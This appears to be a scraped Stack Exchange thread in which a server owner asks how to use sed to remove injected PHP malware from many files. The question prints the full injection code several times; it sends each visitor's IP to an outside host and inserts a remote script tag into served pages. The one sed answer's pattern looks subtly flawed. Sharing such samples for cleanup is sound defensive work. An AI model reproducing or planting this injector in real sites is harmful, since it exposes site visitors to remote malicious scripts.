How do I use the SED command to remove injected code from multiple files?
Clash Royale CLAN TAG#URR8PPP
One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.
I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):
<?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)
if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);
return $_url_get_contents_data;
if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;
if ($buf === FALSE)
// Error reading response
return FALSE;
$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);
if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;
#/7968e7#
?>
<?php
?>
It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.
sed
add a comment |
One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.
I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):
<?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)
if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);
return $_url_get_contents_data;
if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;
if ($buf === FALSE)
// Error reading response
return FALSE;
$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);
if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;
#/7968e7#
?>
<?php
?>
It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.
sed
3
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..
– daniel kullmann
May 5 '14 at 13:35
add a comment |
One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.
I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):
<?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)
if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);
return $_url_get_contents_data;
if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;
if ($buf === FALSE)
// Error reading response
return FALSE;
$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);
if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;
#/7968e7#
?>
<?php
?>
It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.
sed
One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.
I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):
<?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)
if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);
return $_url_get_contents_data;
if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;
if ($buf === FALSE)
// Error reading response
return FALSE;
$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);
if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;
#/7968e7#
?>
<?php
?>
It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.
sed
sed
edited May 2 '14 at 16:12
Braiam
23.7k2077142
23.7k2077142
asked May 2 '14 at 15:52
user3596738user3596738
62
62
3
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..
– daniel kullmann
May 5 '14 at 13:35
add a comment |
3
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..
– daniel kullmann
May 5 '14 at 13:35
3
3
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..
– daniel kullmann
May 5 '14 at 13:35
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..
– daniel kullmann
May 5 '14 at 13:35
add a comment |
1 Answer
1
active
oldest
votes
First do a backup.
This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.
sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename
It will leaves empty php blocks.
<?php
?>
<?php
?>
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f127596%2fhow-do-i-use-the-sed-command-to-remove-injected-code-from-multiple-files%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
First do a backup.
This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.
sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename
It will leaves empty php blocks.
<?php
?>
<?php
?>
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
add a comment |
First do a backup.
This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.
sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename
It will leaves empty php blocks.
<?php
?>
<?php
?>
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
add a comment |
First do a backup.
This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.
sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename
It will leaves empty php blocks.
<?php
?>
<?php
?>
First do a backup.
This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.
sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename
It will leaves empty php blocks.
<?php
?>
<?php
?>
edited May 2 '14 at 22:12
answered May 2 '14 at 16:07
EmmanuelEmmanuel
3,07911120
3,07911120
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
add a comment |
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
add a comment |
Thanks for contributing an answer to Unix & Linux Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f127596%2fhow-do-i-use-the-sed-command-to-remove-injected-code-from-multiple-files%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
3
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..
– daniel kullmann
May 5 '14 at 13:35